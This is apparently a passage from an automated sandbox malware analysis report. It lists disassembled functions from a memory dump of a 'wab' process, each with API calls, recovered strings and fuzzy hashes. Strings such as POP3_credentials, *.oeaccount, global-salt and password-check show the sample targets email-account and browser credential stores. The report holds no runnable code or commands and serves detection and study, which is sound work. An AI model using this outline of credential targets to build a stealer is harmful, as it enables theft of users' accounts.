                                                                                                                                                  • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                  • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                • API String ID: 524865279-2190619648
                                                                                                                                                • Opcode ID: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                • Instruction ID: 2c282e6ff88bd57be97cdb9cd65414afbc0c2375aa853475002addcb7488d922
                                                                                                                                                • Opcode Fuzzy Hash: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                • Instruction Fuzzy Hash: 75316075A4025DAFDB11EB69CC81AEEBBBCEF45314F0080B6FA04A3141D6789F498F65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 2300387033-3849865405
                                                                                                                                                • Opcode ID: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                • Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
                                                                                                                                                • Opcode Fuzzy Hash: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                • Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                • API String ID: 3756086014-1363028141
                                                                                                                                                • Opcode ID: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                • Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
                                                                                                                                                • Opcode Fuzzy Hash: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                • Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                                                                                                                                  • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                  • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                                                                                                                                  • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                  • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                  • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                                                                                                                                  • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                                                                                                                                  • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004436F3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                • String ID: .8D
                                                                                                                                                • API String ID: 1886237854-2881260426
                                                                                                                                                • Opcode ID: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                • Instruction ID: b4a99ca98ea4b9fd05b978b53b3f03ecc28babd8507da3569ede40c7aa85cfb3
                                                                                                                                                • Opcode Fuzzy Hash: e9accfc59e3ea295214b65d31af1a641a7a6f9c6ce4573a7963a3bdc594cfe72
                                                                                                                                                • Instruction Fuzzy Hash: 42012432804248BFEB206F75EC4ED9FBB6CEF46364B10812BF81487261DA358D14CA28
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00408F5D
                                                                                                                                                • sprintf.MSVCRT ref: 00408F72
                                                                                                                                                  • Part of subcall function 0040900D: memset.MSVCRT ref: 00409031
                                                                                                                                                  • Part of subcall function 0040900D: GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                  • Part of subcall function 0040900D: _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00408F99
                                                                                                                                                • EnumChildWindows.USER32(?,Function_00008ED5,00000000), ref: 00408FA9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                • String ID: caption$dialog_%d
                                                                                                                                                • API String ID: 2923679083-4161923789
                                                                                                                                                • Opcode ID: 000f1f906e92f5b03bb8d936c1600f8ee9725489ffd6e52dafee9c1c18951f52
                                                                                                                                                • Instruction ID: 5193b431d0dc7ecedf7a364b2ddef3fe6b5aec68a3d00ff581056cac6fb231a4
                                                                                                                                                • Opcode Fuzzy Hash: 000f1f906e92f5b03bb8d936c1600f8ee9725489ffd6e52dafee9c1c18951f52
                                                                                                                                                • Instruction Fuzzy Hash: 67F0BB745043487FFB129BA0DD06FC97AA8AB08747F0000A6BB44F11E2DBF899908B5E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • cannot release savepoint - SQL statements in progress, xrefs: 004260EE
                                                                                                                                                • cannot open savepoint - SQL statements in progress, xrefs: 00426002
                                                                                                                                                • unknown error, xrefs: 00426E65
                                                                                                                                                • abort due to ROLLBACK, xrefs: 00427E1B
                                                                                                                                                • no such savepoint: %s, xrefs: 004260D0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                • API String ID: 3510742995-3035234601
                                                                                                                                                • Opcode ID: f891372fe87baf48bda125dec3b2232890a750ac063dfed77912f4c4cabfec4f
                                                                                                                                                • Instruction ID: 1b592f7810eb55fdfd9c77514c161e0aeb834189807bd0e5c0ad66af0c508e0f
                                                                                                                                                • Opcode Fuzzy Hash: f891372fe87baf48bda125dec3b2232890a750ac063dfed77912f4c4cabfec4f
                                                                                                                                                • Instruction Fuzzy Hash: 4CC15B70A04625DFDB18CFA9E485BA9BBB1FF08304F5540AFE405A7392D738A851CF99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT ref: 00441F4B
                                                                                                                                                  • Part of subcall function 00441A6C: memcmp.MSVCRT ref: 00441AB5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmpmemcpy
                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                • API String ID: 1784268899-4153596280
                                                                                                                                                • Opcode ID: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                • Instruction ID: db602eaa8e833254b0c0c9be43f42c24c685b457dfa8f14c56b0ec28138b2128
                                                                                                                                                • Opcode Fuzzy Hash: 6b6b8ae9c0e91365de8150e640e5bb5f4ec7e5282d2e56bc441d5ca3420a582e
                                                                                                                                                • Instruction Fuzzy Hash: 5091E2B1900700AFE730AF25C981A9EBBE5AB44304F14492FF14697392C7B9A985CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040F7DE,00000000,?), ref: 0040FB5E
                                                                                                                                                • memset.MSVCRT ref: 0040FBBB
                                                                                                                                                • memset.MSVCRT ref: 0040FBCD
                                                                                                                                                  • Part of subcall function 0040FA44: _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                • memset.MSVCRT ref: 0040FCB4
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040FCD9
                                                                                                                                                • CloseHandle.KERNEL32(?,0040F7DE,?), ref: 0040FD23
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3974772901-0
                                                                                                                                                • Opcode ID: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                • Instruction ID: 4cd0dab2c11de29b1205cc267bdcfe4bbed2ca853fb67bca61950d18440e6937
                                                                                                                                                • Opcode Fuzzy Hash: 4ad987a4bc41c02407afd48bd51c39f8f43132cb09b5aa7545cf57ad8340978a
                                                                                                                                                • Instruction Fuzzy Hash: 79511EB590021CABDB60DF95DD85ADEBBB8FF44305F1000BAE609A2281D7759E84CF69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • wcslen.MSVCRT ref: 00443559
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 0044288D
                                                                                                                                                  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428AB
                                                                                                                                                  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428C6
                                                                                                                                                  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 004428EF
                                                                                                                                                  • Part of subcall function 00442878: ??2@YAPAXI@Z.MSVCRT ref: 00442913
                                                                                                                                                • strlen.MSVCRT ref: 004435BE
                                                                                                                                                  • Part of subcall function 004429E9: ??3@YAXPAX@Z.MSVCRT ref: 004429F4
                                                                                                                                                  • Part of subcall function 004429E9: ??2@YAPAXI@Z.MSVCRT ref: 00442A03
                                                                                                                                                • memcpy.MSVCRT ref: 004435D8
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 577244452-0
                                                                                                                                                • Opcode ID: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                • Instruction ID: ed198900897cbedb477538fc3de06edee324e7a25cf08c3aedaf46951cf6a217
                                                                                                                                                • Opcode Fuzzy Hash: 4370cab8d1ed043324ede4dc3b9a4d06d61cdd8212607e5f6e8765e25bb93f57
                                                                                                                                                • Instruction Fuzzy Hash: 14318672804219AFEF21EF65C8819DEBBB5EF45314F5480AAF108A3200CB396F84DF49
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                  • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                • _strcmpi.MSVCRT ref: 004044FA
                                                                                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                                                                                • String ID: imap$pop3$smtp
                                                                                                                                                • API String ID: 2025310588-821077329
                                                                                                                                                • Opcode ID: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                • Instruction ID: ee17be80c36da3591ff53c386c7625c128025028662cc5e87d89578f4f8b6d75
                                                                                                                                                • Opcode Fuzzy Hash: 4172489bfdd0b02c38134a290eb16c247b5a863f83d9230e12e3431aa9a1b902
                                                                                                                                                • Instruction Fuzzy Hash: C42196B25046189BEB51DB15CD417DAB3FCEF90304F10006BE79AB7181DB787B498B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040BD88
                                                                                                                                                  • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                  • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                  • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                  • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                  • Part of subcall function 00407446: memset.MSVCRT ref: 00407466
                                                                                                                                                  • Part of subcall function 00407446: sprintf.MSVCRT ref: 00407493
                                                                                                                                                  • Part of subcall function 00407446: strlen.MSVCRT ref: 0040749F
                                                                                                                                                  • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074B4
                                                                                                                                                  • Part of subcall function 00407446: strlen.MSVCRT ref: 004074C2
                                                                                                                                                  • Part of subcall function 00407446: memcpy.MSVCRT ref: 004074D2
                                                                                                                                                  • Part of subcall function 00407279: _mbscpy.MSVCRT ref: 004072DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                • API String ID: 2726666094-3614832568
                                                                                                                                                • Opcode ID: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                • Instruction ID: 9cc38d581f61d2a6594629c27ef9ad5a8c62d4d42b688fbaa09f609bba3e4d8d
                                                                                                                                                • Opcode Fuzzy Hash: dc175560a6198b9798b44ce5f971e01ac777fcc381b56c1877e1d198c2103063
                                                                                                                                                • Instruction Fuzzy Hash: 0121FBB1C002599ADB40EFA5D981BDDBBB4AB08308F10517EF548B6281DB382A45CB9E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403A78
                                                                                                                                                • memset.MSVCRT ref: 00403A91
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AA8
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AC7
                                                                                                                                                • strlen.MSVCRT ref: 00403AD9
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AEA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1786725549-0
                                                                                                                                                • Opcode ID: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                • Instruction ID: 3c11530c7ff43e2cab0ee1a3c4b7d34204fc8064c5823527b9b114d7af9e1f20
                                                                                                                                                • Opcode Fuzzy Hash: e58b70ba74cd0776df0cd714b6ebe3d4fb4c03e2cd7b5e97725e455eaa9c95ba
                                                                                                                                                • Instruction Fuzzy Hash: 50112DBA80412CBFFB10AB94DC85EEBB3ADEF09355F0001A6B715D2092D6359F548B78
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040BEB8
                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BECA
                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00446634,00000000,?), ref: 0040BEEC
                                                                                                                                                • OpenClipboard.USER32(?), ref: 0040BF0C
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040BF25
                                                                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040BF42
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2014771361-0
                                                                                                                                                • Opcode ID: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                • Instruction ID: 907fbb9bc954c15d9eb0ad6f98a85717611d4d669dd49ad048df0fde8b6b2f4b
                                                                                                                                                • Opcode Fuzzy Hash: f1e64fb6be10128bbee6f3e595a742589036f7cac5447e39c680a47d04657e65
                                                                                                                                                • Instruction Fuzzy Hash: 5B11A1B6900218ABDF20AB61DC49FDB77BCAB11701F0000B6B685E2092DBB499C48F68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memcmp.MSVCRT ref: 00406129
                                                                                                                                                  • Part of subcall function 00406057: memcmp.MSVCRT ref: 00406075
                                                                                                                                                  • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060A4
                                                                                                                                                  • Part of subcall function 00406057: memcpy.MSVCRT ref: 004060B9
                                                                                                                                                • memcmp.MSVCRT ref: 00406154
                                                                                                                                                • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                • memcpy.MSVCRT ref: 00406199
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                • String ID: global-salt$password-check
                                                                                                                                                • API String ID: 231171946-3927197501
                                                                                                                                                • Opcode ID: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                • Instruction ID: 655c6eb068c7835b63414ef3c9938ae25085d91347c247b77763f6b5778615a8
                                                                                                                                                • Opcode Fuzzy Hash: e64782263ff5605526e0fe757cea6ed3191f710ccf3b0afa5e67e353afe61262
                                                                                                                                                • Instruction Fuzzy Hash: E301D8B954070466FF202A628C42B8B37585F51758F024137FD067D2D3E37E87748A4E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                • Instruction ID: 5b630ca211e00ee6ab232d4f5fe81ba50f7f923f282134244f429d4b925a3085
                                                                                                                                                • Opcode Fuzzy Hash: 61b661c510ad4b0743117b2440ebaa6c68aec67bf7d0c3759525eee1844cf9ab
                                                                                                                                                • Instruction Fuzzy Hash: 7501A272E0AD31A7E1257A76554135BE3686F04B29F05024FB904772428B6C7C5445DE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004016A2
                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 004016B0
                                                                                                                                                • GetSystemMetrics.USER32(00000014), ref: 004016BC
                                                                                                                                                • BeginPaint.USER32(?,?), ref: 004016D6
                                                                                                                                                • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E5
                                                                                                                                                • EndPaint.USER32(?,?), ref: 004016F2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 19018683-0
                                                                                                                                                • Opcode ID: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                • Instruction ID: 724a62348f30ed3062fc78c586e299175c66965872e24402369681ac2eeab922
                                                                                                                                                • Opcode Fuzzy Hash: d93d450dc478f7866c229f4a037813e0caab4cabbf567c971482d52d831a5164
                                                                                                                                                • Instruction Fuzzy Hash: 0701FB76900619AFDF04DFA8DC499FE7BBDFB45301F00046AEA11AB295DAB1A914CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DestroyWindow.USER32(?), ref: 0040C352
                                                                                                                                                • SetFocus.USER32(?,?,?), ref: 0040C3F8
                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 0040C4F5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                • String ID: XgD$rY@
                                                                                                                                                • API String ID: 3502187192-1347721759
                                                                                                                                                • Opcode ID: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                • Instruction ID: f774ea8d8eb1800fd2ad86f321479c1d669f6cdc6fcff53b53818c93aeeaee42
                                                                                                                                                • Opcode Fuzzy Hash: 0547b1f3527a77a0dd6e05b9ba2639b12fbf26f65146718a21d2de361d27d990
                                                                                                                                                • Instruction Fuzzy Hash: 6F518630A04701DBCB34BB658885D9AB3E0BF51724F44C63FF4656B2E2C779A9818B8D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00406376
                                                                                                                                                • memcpy.MSVCRT ref: 00406389
                                                                                                                                                • memcpy.MSVCRT ref: 0040639C
                                                                                                                                                  • Part of subcall function 00404883: memset.MSVCRT ref: 004048BD
                                                                                                                                                  • Part of subcall function 00404883: memset.MSVCRT ref: 004048D1
                                                                                                                                                  • Part of subcall function 00404883: memset.MSVCRT ref: 004048E5
                                                                                                                                                  • Part of subcall function 00404883: memcpy.MSVCRT ref: 004048F7
                                                                                                                                                  • Part of subcall function 00404883: memcpy.MSVCRT ref: 00404909
                                                                                                                                                • memcpy.MSVCRT ref: 004063E0
                                                                                                                                                • memcpy.MSVCRT ref: 004063F3
                                                                                                                                                • memcpy.MSVCRT ref: 00406420
                                                                                                                                                • memcpy.MSVCRT ref: 00406435
                                                                                                                                                  • Part of subcall function 0040625B: memcpy.MSVCRT ref: 00406287
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                • Opcode ID: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                • Instruction ID: a962c966a65fcbb98db0a5903e2df7d2d9caef1a51b72161af640e80cc8fe1a9
                                                                                                                                                • Opcode Fuzzy Hash: c11b14cc7bfefcbecd474d69538c451392e9e517f6ba4719ba6800d6460efb6e
                                                                                                                                                • Instruction Fuzzy Hash: 744140B290050DBEEB51DAE8CC41EEFBB7CAB4C704F004476F704F6051E635AA598BA6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00443E43
                                                                                                                                                • memset.MSVCRT ref: 00443E5C
                                                                                                                                                • memset.MSVCRT ref: 00443E70
